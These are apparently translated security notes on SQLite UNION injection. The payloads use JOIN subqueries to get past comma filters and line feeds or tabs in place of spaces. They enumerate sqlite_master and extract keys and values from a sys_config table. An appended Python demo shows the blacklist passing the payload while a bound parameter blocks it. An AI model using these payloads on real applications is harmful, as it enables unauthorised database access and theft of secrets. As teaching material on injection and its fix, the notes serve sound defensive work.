SQLite


JOIN injection: this method can be used when commas (,) are filtered.

SELECT *
FROM users
UNION
SELECT *
FROM (
(SELECT 1) A
JOIN (SELECT 2) B
JOIN (SELECT 3) C
JOIN (SELECT 4) D
);

If spaces are filtered as well, %0a (URL-encoded line feed) or %09 (URL-encoded horizontal tab) can be used in their place.
https://blog.csdn.net/qq_61778128/article/details/123205490

Enumerating tables through SQLite injection

1	
union
select *
from
(select 1) a
join (select 2) b
join (select 3) c
join (SELECT name FROM sqlite_master) d
join (SELECT sql FROM sqlite_master) f

Once the table has been found:

1	
union select *
from
(select 1) a
join (select 2) b
join (select 3) c
join (SELECT config_key FROM sys_config) d
join (SELECT config_value FROM sys_config) f
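
Why filtering commas and spaces does not fix the underlying flaw, shown as an added example that is not part of the original notes: the page's last payload passes such a blacklist unchanged, while a bound parameter treats it as plain data. The five-column `users` table, the sample rows and the function names are assumptions made for this demonstration.

```python
import sqlite3

def make_db():
    """In-memory database with constructed sample rows (not from the page)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, name TEXT, email TEXT, role TEXT, created TEXT);
        INSERT INTO users VALUES (1, 'alice', 'alice@example.test', 'user', '2024-01-01');
        CREATE TABLE sys_config (config_key TEXT, config_value TEXT);
        INSERT INTO sys_config VALUES ('api_token', 'constructed-secret');
    """)
    return db

def blacklist_ok(value):
    """Weak control: reject any input containing a comma or a space."""
    return "," not in value and " " not in value

def lookup_concat(db, user_id):
    """Vulnerable: the filtered input is still concatenated into the SQL text."""
    if not blacklist_ok(user_id):
        raise ValueError("blocked by filter")
    return db.execute("SELECT * FROM users WHERE id = " + user_id).fetchall()

def lookup_param(db, user_id):
    """Hardened: the value is bound as data and never parsed as SQL."""
    return db.execute("SELECT * FROM users WHERE id = ?", (user_id,)).fetchall()

# The page's final payload, with every whitespace run replaced by a line feed
# (the character that %0a decodes to).
PAYLOAD = "\n".join("""1 union select * from (select 1) a join (select 2) b
join (select 3) c join (SELECT config_key FROM sys_config) d
join (SELECT config_value FROM sys_config) f""".split())

if __name__ == "__main__":
    db = make_db()
    print("filter passes payload:", blacklist_ok(PAYLOAD))
    print("concatenated query   :", lookup_concat(db, PAYLOAD))
    print("parameterized query  :", lookup_param(db, PAYLOAD))
```
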